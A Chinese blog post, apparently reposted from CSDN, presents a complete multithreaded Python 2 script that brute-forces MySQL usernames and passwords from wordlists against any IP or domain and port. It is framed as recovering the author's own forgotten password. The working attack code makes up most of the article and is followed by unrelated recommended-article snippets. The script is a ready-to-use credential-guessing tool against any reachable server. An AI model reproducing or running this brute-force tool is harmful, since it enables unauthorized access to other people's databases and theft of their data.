用Python写了个工具,完美破解了MySQL
Python网络爬虫与数据挖掘
共 3132字,需浏览 7分钟
· 2021-08-11
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:
https://blog.csdn.net/l1028386804/article/details/118378477
今天下班回家想登录MySQL数据库,很遗憾,我忘记了MySQL数据库的用户和密码。我该怎么办?使用安全模式登录?我想每个人都应该知道这样一种传统的方式!今天,让我们来做个改变,就是用Python写一个工具来破解MySQL,看看它能不能破解出MySQL的用户和密码。
爆破脚本
待破解的ip/domain:例如127.0.0.1
端口:例如3306
数据库:例如test
用户名列表文件:例如user.txt文件
密码列表文件:例如password.txt文件
下面给出完整的脚本代码:
#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: utf-8 -*-# Date: 2021/07/25# Created by 盟主# Description MySQL暴力破解工具多线程版import os, sys, re, socket, timefrom functools import partialfrom multiprocessing.dummy import Pool as ThreadPooltry:import MySQLdbexcept ImportError:print '\n[!] MySQLdb模块导入错误,请到下面网址下载:'print '[!] http://www.codegood.com/archives/129'exit()def usage():print '+' + '-' * 50 + '+'print '\t Python MySQL暴力破解工具多线程版'print '\t 微信公众号:Python联盟'print '\t\t Code BY: 盟主'print '\t\t Time:2021-06-30'print '+' + '-' * 50 + '+'if len(sys.argv) != 6:print "用法: " + os.path.basename(sys.argv[0]) + " 待破解的ip/domain 端口 数据库 用户名列表 密码列表"print "实例: " + os.path.basename(sys.argv[0]) + " 127.0.0.1 3306 test user.txt pass.txt"sys.exit()def mysql_brute(user, password):"mysql数据库破解函数"db = Nonetry:# print "user:", user, "password:", passworddb = MySQLdb.connect(host=host, user=user, passwd=password, db=sys.argv[3], port=int(sys.argv[2]))# print '[+] 破解成功:', user, passwordresult.append('用户名:' + user + "\t密码:" + password)except KeyboardInterrupt:print '已成功退出程序!'exit()except MySQLdb.Error, msg:print '程序出错,错误信息为:', msgpassfinally:if db:db.close()if __name__ == '__main__':usage()start_time = time.time()if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):host = sys.argv[1]else:host = socket.gethostbyname(sys.argv[1])userlist = [i.rstrip() for i in open(sys.argv[4])]passlist = [j.rstrip() for j in open(sys.argv[5])]print '\n[+] 目 标:%s \n' % sys.argv[1]print '[+] 用户名:%d 条\n' % len(userlist)print '[+] 密 码:%d 条\n' % len(passlist)print '[!] 密码破解中,请稍候……\n'result = []for user in userlist:partial_user = partial(mysql_brute, user)pool = ThreadPool(10)pool.map(partial_user, passlist)pool.close()pool.join()if len(result) != 0:print '[+] MySQL密码破解成功!\n'for x in {}.fromkeys(result).keys():print x + '\n'else:print '[-] MySQL密码破解失败!\n'print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)
脚本编写完成后,运行,等待了一段时间,将我的MySQL的用户和密码完美的破解出来了。
- EOF -
回复关键字“简明python ”,立即获取入门必备书籍《简明python教程》电子版
回复关键字“爬虫”,立即获取爬虫学习资料
推荐
评论
金融研究 | 使用Python测量关键审计事项的「信息含量」
Tips: 公众号推送后内容只能更改一次,且只能改20字符。如果内容出问题,或者想更新内容, 只能重复推送。为了更好的阅读体验,建议阅读本文博客版, 链接地址https://textdata.cn/blog/2023-01-13-information-content-of-critical-aud
大邓和他的Python
0
金融研究(更新) | 使用Python构建关键审计事项的「信息含量」
Tips: 公众号推送后内容只能更改一次,且只能改20字符。如果内容出问题,或者想更新内容, 只能重复推送。为了更好的阅读体验,建议阅读本文博客版, 链接地址https://textdata.cn/blog/2023-01-13-information-content-of-critical-aud
大邓和他的Python
0
老爸嘲讽我了,写破代码一年就挣十几万,他在工地带50个工人,一个月光人头费就3万,让我滚回去跟他干!
点击上方 "大数据肌肉猿"关注, 星标一起成长点击下方链接,进入高质量学习交流群今日更新| 1052个转型案例分享-大数据交流群来自:网络,侵删有个网友的父亲是做工程的,天天就嘲笑他,说他天天写着破代码有啥用,一年就拿个十多万的死工资,然后告诉他自己在工地里面带了50个工人,一个月能抽三万
程序源代码
0
谷歌员工爆料 Python 基础团队原地解散
转自 | 机器之心编辑 | 蛋酱什么?谷歌解雇了整个 Python 基础团队?「当与你直接共事的每个人,包括你的主管,都被裁员 —— 哦,是职位被削减,而你被要求安排他们的替代者入职,这些人被告知在不同的国家担任同样的职位,但他们并不为此感到高兴,这是很艰难的一天。」发布这一动态的 Tho
机器学习算法与Python实战
0
五一抢票难,Github上这几个Python项目,你可以试试
又到五一长假啦(虽然其实就放了1天),大家是打算家里蹲or出去玩,又或者是在公司加班呢...今天给大家介绍三个和12306相关的项目,看看你是否用得上。/01/ py12306py12306购票助手,顾名思义,12306买票的~需要在python 3.6以上版本运行程序。1. 安装依赖gi
Crossin的编程教室
0
真心建议大家搞个香港身份,再不冲就晚了
香港一直有“互联网荒漠”之称,疫情这三年,香港开始大力扶持互联网 科技工程 /IT产业,公布了《香港智慧城市蓝图》。目前规划已经覆盖到交通、医疗、经济、教育、环境等多个方面。目前在智能制造,5G网络、智慧城市等领域人才,通过香港优才计划入境都极具优势。什么是香港优才计划优才计划,全称优秀人才入境计划
公子龙
0
谷歌员工爆料Python基础团队原地解散
机器之心报道编辑:蛋酱什么?谷歌解雇了整个 Python 基础团队?「当与你直接共事的每个人,包括你的主管,都被裁员 —— 哦,是职位被削减,而你被要求安排他们的替代者入职,这些人被告知在不同的国家担任同样的职位,但他们并不为此感到高兴,这是很艰难的一天。」发布这一动态的 Thomas Wouter
机器学习初学者
0
Python加速运行技巧
Python 是一种脚本语言,相比 C/C++ 这样的编译语言,在效率和性能方面存在一些不足。但是,有很多时候,Python 的效率并没有想象中的那么夸张。本文对一些 Python 代码加速运行的技巧进行整理。 0. 代码优化原则 本文会介绍不少的 Python 代码加速运行的技巧。在深入代码优化细
机器学习算法与Python实战
0